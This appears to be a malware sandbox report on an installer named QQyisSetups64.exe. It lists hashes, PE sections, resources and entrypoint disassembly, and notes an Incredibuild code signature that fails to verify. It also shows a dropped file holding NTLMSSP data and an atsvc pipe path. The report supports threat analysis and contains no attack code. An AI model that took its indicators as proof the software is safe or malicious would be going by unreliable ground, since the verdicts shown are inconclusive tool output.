SHA-512:	96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:	false
Preview:	{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

\Device\Mup\localhost\pipe\atsvc

Download File

Process:	C:\Users\user\Desktop\QQyisSetups64.exe
File Type:	GLS_BINARY_LSB_FIRST
Category:	dropped
Size (bytes):	4701
Entropy (8bit):	7.79237311949855
Encrypted:	false
SSDEEP:	96:XbWzUklw93FEuO9oZ2uO9wqumQRE+4J9nio2bCa+atNmkIbHipri:XboUrENP9A1RXtptNmkwwi
MD5:	9374FD947B0EA91E37B158A7FE23669F
SHA1:	40CF2CAEB6F62C2A91B5D6DA253D156F37B8B9D9
SHA-256:	F8BED533A9E238FE7E27ADF2B838642E123A3E5EC8C30544746EDA3316C1C38C
SHA-512:	843AF4E051DB4E2771B3DB76CFFB8BA94069DB456CF426EDBC66A1A0F20AAD51FAA9C8526DFA31DD9BCB7262A03C352AD67DFCF7676AA91E839B3B3794950414
Malicious:	false
Preview:	..........=.....................IY..D@.$.621.......]..........+.H`........IY..D@.$.621......,..l..@E....................NTLMSSP.............4.......(.....aJ....user-PCWORKGROUP........t.X.................NTLMSSP.........X.......X.......X.......X.......X.......X...5....aJ....s..T.".x)Oii.d+.................P........Jd .i..../#/9..W...W ...p..Z....x\|......'./..T$+3...)=....iD...A.(..6..1..i............S.<.......................\.......l7.t-eC..Z .B\|../Y..@.E.[M..Z.Q.......E..3L..H.V.%......0.F........y.N.D.........p.E...Ej..wU....(a.......M.f.0a...........0wVf.<.l.~Hf :..........n..UC....>>....[wO.N.$a.n%i..).R...p.....[iZ .y6m...K.K..+.\|rX.e...D.b...R.].$......`"z.>c...[.&........y9w.....gZ.?K...L.....Y....E......<.....w...^....a.a._..P....yI@R0,....i'..N....#.{.Z..7:........tR.S...K-L..P.SHy............~de.L...+..N..=L.4.............%MGY....cG.w`[`{i.]..._.....9.D.q.U..t\.w.[........T..X...Z."...a.eL..1.....Z.\./.#.Pd..%..$...@..A).rdu.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.236599313454909
TrID:	Win32 Executable (generic) a (10002005/4) 98.44% Inno Setup installer (109748/4) 1.08% InstallShield setup (43055/19) 0.42% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	QQyisSetups64.exe
File size:	5'289'240 bytes
MD5:	b4f00fba3327488d4cb6fd36b2d567c6
SHA1:	4f0548a2f6bf73a85ff17f40f420098019ac05ff
SHA256:	d6a84954e038ddf4a0026705e0942fc003cfdc04e58f658a6bd9e89c37c57d18
SHA512:	c573147adfeba7d313cc79498a1c107679f0e69805e3aa8260b3e57dba282088bca082536d7866d4708529bf8c3bef56b2005bd9d59a870e3d29132f6fd3d897
SSDEEP:	98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
TLSH:	4E36CFA0B642C822C1631678DD1B97F5B975BF315F641893BAF53E0C3E3E5623828297
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	dd9d5b5252b5b513

Static PE Info

General

Entrypoint:	0x6dc144
Entrypoint Section:	.itext
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x64C252F8 [Thu Jul 27 11:20:24 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	07af52ac52c26a20d4efc068ff8bb754

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	17/07/2022 20:00:00 17/07/2024 19:59:59
Subject Chain	CN=Incredibuild Software Ltd., O=Incredibuild Software Ltd., S=Tel Aviv, C=IL
Version:	3
Thumbprint MD5:	8164525B12F9B6829CCD5054865F2D41
Thumbprint SHA-1:	583F01EE72450A9945FB1CFA539BAAB983D3F1D9
Thumbprint SHA-256:	2EBD549CFBD28201F8773F370E920A21BB010F577BA74B4726332D2CE7836F69
Serial:	7098774ED29B0565AB114EF2F2871CF7

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 006D9A34h
call 00007F0DD12CEC29h
call 00007F0DD15A0350h
mov edx, 006F8295h
mov eax, 006F8294h
call 00007F0DD15A0389h
movzx edx, byte ptr [006F8295h]
movzx eax, byte ptr [006F8294h]
call 00007F0DD15A08A6h
mov eax, dword ptr [006EDC88h]
movzx eax, byte ptr [eax]
sub al, 01h
jc 00007F0DD15A3371h
je 00007F0DD15A337Bh
dec al
je 00007F0DD15A338Ah
dec al
jne 00007F0DD15A3390h
call 00007F0DD159A5B3h
mov eax, dword ptr [eax]
xor ecx, ecx
mov dl, 01h
call 00007F0DD159A98Ch
jmp 00007F0DD15A33E0h
call 00007F0DD15A090Eh
mov byte ptr [006F8294h], al
jmp 00007F0DD15A336Fh
movzx eax, byte ptr [006F8295h]
call 00007F0DD15A0A57h
mov byte ptr [006F8294h], al
jmp 00007F0DD15A335Ch
call 00007F0DD15A0B93h
mov byte ptr [006F8294h], al
cmp byte ptr [006F8294h], 00000000h
jne 00007F0DD15A33ABh
mov eax, dword ptr [006EDDD4h]
mov eax, dword ptr [eax]
call 00007F0DD134086Dh
mov eax, dword ptr [006EDDD4h]
mov eax, dword ptr [eax]
mov edx, 006DC240h
call 00007F0DD1340314h
mov ecx, dword ptr [006EDCC8h]
mov eax, dword ptr [006EDDD4h]
mov eax, dword ptr [eax]
mov edx, dword ptr [006D3F6Ch]
call 00007F0DD234085Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2f9000	0x3f96	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x329000	0x1ef260	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x508c00	0x2918	.rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2ff000	0x29718	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2fe000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2f9bc8	0x9ac	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2d9294	0x2d9400	843d15a461a9c4305f404d664c6d1b05	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x2db000	0x1250	0x1400	9be26a59bc8233b92ec9bd79fd07ff13	False	0.5412109375	data	6.099813281792287	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2dd000	0x11078	0x11200	256a4c2423eae8f79b8ed7215ca95be3	False	0.3919793567518248	data	4.519234114373622	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x2ef000	0x9298	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x2f9000	0x3f96	0x4000	59ebf4c01c9630c427cf9d4c8d4e72de	False	0.312255859375	data	5.248510626082326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x2fd000	0xd8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x2fe000	0x18	0x200	bf0ac182db40dc29be077f98bf131377	False	0.052734375	data	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2ff000	0x29718	0x29800	977696233ec3926b686d0b5feb0a425f	False	0.5087125847138554	data	6.690448253628545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x329000	0x1ef260	0x1ef400	b3c5a3459f4cfe7e4d03cb542f60f1be	False	0.8037331208985361	data	7.776375373000245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x32bf78	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x32c0ac	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x32c1e0	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x32c314	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	Hebrew	Israel	0.4675324675324675
RT_CURSOR	0x32c448	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x32c57c	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x32c6b0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_CURSOR	0x32c7e4	0x134	data	Hebrew	Israel	0.3961038961038961
RT_CURSOR	0x32c918	0x134	data	Hebrew	Israel	0.30194805194805197
RT_CURSOR	0x32ca4c	0x134	data	Hebrew	Israel	0.30194805194805197
RT_CURSOR	0x32cb80	0x134	data	English	United States	0.38311688311688313
RT_BITMAP	0x32ccb4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x32ce84	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x32d068	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x32d238	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x32d408	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x32d5d8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x32d7a8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x32d978	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x32db48	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x32dd18	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x32dee8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5208333333333334
RT_BITMAP	0x32dfa8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42857142857142855
RT_BITMAP	0x32e088	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.4955357142857143
RT_BITMAP	0x32e168	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.38392857142857145
RT_BITMAP	0x32e248	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4947916666666667
RT_BITMAP	0x32e308	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.484375
RT_BITMAP	0x32e3c8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.42410714285714285
RT_BITMAP	0x32e4a8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.5104166666666666
RT_BITMAP	0x32e568	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.5
RT_BITMAP	0x32e648	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0x32e730	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors	English	United States	0.4895833333333333
RT_BITMAP	0x32e7f0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors			0.35
RT_BITMAP	0x32ed18	0xc0	Device independent bitmap graphic, 11 x 11 x 4, image size 88	Russian	Russia	0.4479166666666667
RT_BITMAP	0x32edd8	0xc0	Device independent bitmap graphic, 11 x 11 x 4, image size 88	Russian	Russia	0.4479166666666667
RT_BITMAP	0x32ee98	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	Russian	Russia	0.35344827586206895
RT_BITMAP	0x32ef80	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.2192622950819672
RT_BITMAP	0x32f168	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.14959016393442623
RT_BITMAP	0x32f350	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.1762295081967213
RT_BITMAP	0x32f538	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.20901639344262296
RT_BITMAP	0x32f720	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.2151639344262295
RT_BITMAP	0x32f908	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.1680327868852459
RT_BITMAP	0x32faf0	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.14549180327868852
RT_BITMAP	0x32fcd8	0x1e8	Device independent bitmap graphic, 44 x 16 x 4, image size 384			0.1557377049180328
RT_BITMAP	0x32fec0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256			0.36742424242424243
RT_BITMAP	0x3303e8	0x518	Device independent bitmap graphic, 16 x 15 x 8, image size 240			0.33588957055214724
RT_BITMAP	0x330900	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors	Russian	Russia	0.18863636363636363
RT_BITMAP	0x330e28	0x518	Device independent bitmap graphic, 16 x 15 x 8, image size 240			0.3581288343558282
RT_BITMAP	0x331340	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 3859 x 3859 px/m, 256 important colors	Russian	Russia	0.13636363636363635
RT_BITMAP	0x331868	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors	Russian	Russia	0.09090909090909091
RT_BITMAP	0x331d90	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256			0.36515151515151517
RT_BITMAP	0x3322b8	0x6a8	Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m			0.10387323943661972
RT_BITMAP	0x332960	0x6a8	Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m			0.09213615023474178
RT_BITMAP	0x333008	0x6a8	Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m			0.10387323943661972
RT_BITMAP	0x3336b0	0x6a8	Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m			0.0721830985915493
RT_BITMAP	0x333d58	0x6a8	Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m			0.0698356807511737
RT_BITMAP	0x334400	0x6a8	Device independent bitmap graphic, 40 x 16 x 8, image size 640, resolution 2834 x 2834 px/m			0.06924882629107981
RT_BITMAP	0x334aa8	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256			0.33181818181818185
RT_BITMAP	0x334fd0	0x108	Device independent bitmap graphic, 10 x 7 x 24, image size 224			0.14772727272727273
RT_BITMAP	0x3350d8	0x208	Device independent bitmap graphic, 10 x 15 x 24, image size 480			0.13076923076923078
RT_BITMAP	0x3352e0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	Russian	Russia	0.3620689655172414
RT_BITMAP	0x3353c8	0x668	Device independent bitmap graphic, 24 x 24 x 8, image size 576, resolution 3779 x 3779 px/m, 256 important colors	Russian	Russia	0.4682926829268293
RT_BITMAP	0x335a30	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors			0.12954545454545455
RT_BITMAP	0x335f58	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128			0.4870689655172414
RT_BITMAP	0x336040	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors	Russian	Russia	0.24772727272727274
RT_BITMAP	0x336568	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2898 x 2898 px/m, 256 important colors			0.22575757575757577
RT_BITMAP	0x336a90	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/m	Russian	Russia	0.38362068965517243
RT_BITMAP	0x336b78	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/m	Russian	Russia	0.375
RT_BITMAP	0x336c60	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2882 x 2882 px/m, 256 important colors	Russian	Russia	0.21363636363636362
RT_BITMAP	0x337188	0x518	Device independent bitmap graphic, 16 x 15 x 8, image size 240			0.3581288343558282
RT_BITMAP	0x3376a0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors	Russian	Russia	0.2878787878787879
RT_BITMAP	0x337bc8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m			0.3232758620689655
RT_BITMAP	0x337cb0	0x1a8	Device independent bitmap graphic, 40 x 16 x 4, image size 320			0.17688679245283018
RT_BITMAP	0x337e58	0x1a8	Device independent bitmap graphic, 40 x 16 x 4, image size 320			0.18160377358490565
RT_BITMAP	0x338000	0x1a8	Device independent bitmap graphic, 40 x 16 x 4, image size 320			0.18160377358490565
RT_BITMAP	0x3381a8	0x1a8	Device independent bitmap graphic, 40 x 16 x 4, image size 320			0.18160377358490565
RT_BITMAP	0x338350	0x1a8	Device independent bitmap graphic, 40 x 16 x 4, image size 320			0.18160377358490565
RT_BITMAP	0x3384f8	0x1d0	Device independent bitmap graphic, 44 x 15 x 4, image size 360			0.18318965517241378
RT_BITMAP	0x3386c8	0x1d0	Device independent bitmap graphic, 44 x 15 x 4, image size 360			0.18318965517241378
RT_BITMAP	0x338898	0x1d0	Device independent bitmap graphic, 44 x 15 x 4, image size 360			0.18318965517241378
RT_BITMAP	0x338a68	0x1d0	Device independent bitmap graphic, 44 x 15 x 4, image size 360			0.17456896551724138
RT_BITMAP	0x338c38	0x1d0	Device independent bitmap graphic, 44 x 15 x 4, image size 360			0.17025862068965517
RT_BITMAP	0x338e08	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m			0.3793103448275862
RT_BITMAP	0x338ef0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2834 x 2834 px/m	Russian	Russia	0.38362068965517243
RT_BITMAP	0x338fd8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 3780 x 3780 px/m	Russian	Russia	0.375
RT_BITMAP	0x3390c0	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4895833333333333
RT_BITMAP	0x339180	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors	Russian	Russia	0.2787878787878788
RT_BITMAP	0x3396a8	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2819767441860465
RT_BITMAP	0x339800	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.27906976744186046
RT_BITMAP	0x339958	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2936046511627907
RT_BITMAP	0x339ab0	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2936046511627907
RT_BITMAP	0x339c08	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.3226744186046512
RT_BITMAP	0x339d60	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2616279069767442
RT_BITMAP	0x339eb8	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2877906976744186
RT_BITMAP	0x33a010	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2761627906976744
RT_BITMAP	0x33a168	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.3081395348837209
RT_BITMAP	0x33a2c0	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.3023255813953488
RT_BITMAP	0x33a418	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2761627906976744
RT_BITMAP	0x33a570	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.29069767441860467
RT_BITMAP	0x33a6c8	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.24709302325581395
RT_BITMAP	0x33a820	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.3081395348837209
RT_BITMAP	0x33a978	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.27325581395348836
RT_BITMAP	0x33aad0	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.26744186046511625
RT_BITMAP	0x33ac28	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2877906976744186
RT_BITMAP	0x33ad80	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2877906976744186
RT_BITMAP	0x33aed8	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.2703488372093023
RT_BITMAP	0x33b030	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.26744186046511625
RT_BITMAP	0x33b188	0x158	Device independent bitmap graphic, 20 x 20 x 4, image size 240			0.26453488372093026
RT_BITMAP	0x33b2e0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128, resolution 2835 x 2835 px/m			0.31896551724137934
RT_BITMAP	0x33b3c8	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256	Russian	Russia	0.31212121212121213
RT_BITMAP	0x33b8f0	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	Russian	Russia	0.41810344827586204
RT_BITMAP	0x33b9d8	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	Russian	Russia	0.3706896551724138
RT_BITMAP	0x33bac0	0x528	Device independent bitmap graphic, 16 x 16 x 8, image size 256, resolution 2850 x 2850 px/m, 256 important colors	Russian	Russia	0.23863636363636365
RT_BITMAP	0x33bfe8	0x118	Device independent bitmap graphic, 7 x 10 x 24, image size 240			0.1357142857142857
RT_BITMAP	0x33c100	0x2c8	Device independent bitmap graphic, 31 x 7 x 24, image size 672			0.09691011235955056
RT_BITMAP	0x33c3c8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors	English	United States	0.3794642857142857
RT_ICON	0x33c4a8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2402482269503546
RT_ICON	0x33c910	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09943714821763602
RT_ICON	0x33d9b8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2402482269503546
RT_ICON	0x33de20	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09943714821763602
RT_DIALOG	0x33eec8	0x52	data			0.7682926829268293
RT_DIALOG	0x33ef1c	0x52	data			0.7560975609756098
RT_STRING	0x33ef70	0x2d4	data			0.3798342541436464
RT_STRING	0x33f244	0x238	data			0.522887323943662
RT_STRING	0x33f47c	0x188	data			0.5051020408163265
RT_STRING	0x33f604	0xd0	StarOffice Gallery theme o, 1929405696 objects, 1st N			0.6538461538461539
RT_STRING	0x33f6d4	0x150	data			0.5
RT_STRING	0x33f824	0x4f4	data			0.3667192429022082
RT_STRING	0x33fd18	0x2c4	data			0.461864406779661
RT_STRING	0x33ffdc	0x45c	data			0.4211469534050179
RT_STRING	0x340438	0xd8	data			0.6666666666666666
RT_STRING	0x340510	0xd8	data			0.6574074074074074
RT_STRING	0x3405e8	0x188	data			0.5408163265306123
RT_STRING	0x340770	0x3d8	data			0.41565040650406504
RT_STRING	0x340b48	0x3b8	data			0.39285714285714285
RT_STRING	0x340f00	0x3e0	data			0.37701612903225806
RT_STRING	0x3412e0	0x36c	data			0.3538812785388128
RT_STRING	0x34164c	0x378	data			0.40540540540540543
RT_STRING	0x3419c4	0xc4	data			0.6173469387755102
RT_STRING	0x341a88	0x9c	data			0.6346153846153846
RT_STRING	0x341b24	0x2d4	data			0.44751381215469616
RT_STRING	0x341df8	0x434	data			0.34107806691449816
RT_STRING	0x34222c	0x2ec	data			0.37566844919786097
RT_STRING	0x342518	0x304	data			0.3432642487046632
RT_RCDATA	0x34281c	0x10	data			1.5
RT_RCDATA	0x34282c	0xe04	data			0.5638238573021181
RT_RCDATA	0x343630	0xe5c	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced			1.0029923830250271
RT_RCDATA	0x34448c	0x1f8	PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced			1.0158730158730158
RT_RCDATA	0x344684	0x19a	PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced			1.002439024390244
RT_RCDATA	0x344820	0xcbd	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced			1.003373198405397
RT_RCDATA	0x3454e0	0xd21	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced			1.0032728354656353
RT_RCDATA	0x346204	0xccb	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced			1.0033587786259541
RT_RCDATA	0x346ed0	0x1e5	PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced			1.0185567010309278
RT_RCDATA	0x3470b8	0x1f6	PNG image data, 16 x 16, 8-bit gray+alpha, non-interlaced			1.0179282868525896
RT_RCDATA	0x3472b0	0xe5d	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced			1.0029915692140332
RT_RCDATA	0x348110	0x43cf6	Delphi compiled form 'TAgentFindForm'			0.9157911791179117
RT_RCDATA	0x38be08	0x617	Delphi compiled form 'TBevelTitle'			0.43617703656189866
RT_RCDATA	0x38c420	0x3d6	Delphi compiled form 'TBuildMonitorDialogWithLinkForm'			0.47963340122199594
RT_RCDATA	0x38c7f8	0x4481a	Delphi compiled form 'TBuildMonitorForm_'			0.9107490324374025
RT_RCDATA	0x3d1014	0x43c17	Delphi compiled form 'TFindBarForm'			0.9161991445877338
RT_RCDATA	0x414c2c	0x4b2	Delphi compiled form 'TfrmBuildReport'			0.5099833610648918
RT_RCDATA	0x4150e0	0x3a3	Delphi compiled form 'TInputDialog'			0.5445757250268528
RT_RCDATA	0x415484	0x43687	Delphi compiled form 'TMonitorGraphListForm'			0.9217067543634079
RT_RCDATA	0x458b0c	0x7a34a	Delphi compiled form 'TMonitorViewForm'			0.6451651570060373
RT_RCDATA	0x4d2e58	0x441a0	Delphi compiled form 'TOpenBuildMonFileDialog'			0.9121830905127911
RT_RCDATA	0x516ff8	0x573	Delphi compiled form 'TSaveAttachmentsForm'			0.45878136200716846
RT_GROUP_CURSOR	0x51756c	0x14	Lotus unknown worksheet or configuration, revision 0x1	Hebrew	Israel	1.3
RT_GROUP_CURSOR	0x517580	0x14	Lotus unknown worksheet or configuration, revision 0x1	Hebrew	Israel	1.3
RT_GROUP_CURSOR	0x517594	0x14	Lotus unknown worksheet or configuration, revision 0x1	Hebrew	Israel	1.3
RT_GROUP_CURSOR	0x5175a8	0x14	Lotus unknown worksheet or configuration, revision 0x1	Hebrew	Israel	1.3
RT_GROUP_CURSOR	0x5175bc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x5175d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x5175e4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x5175f8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x51760c	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x517620	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
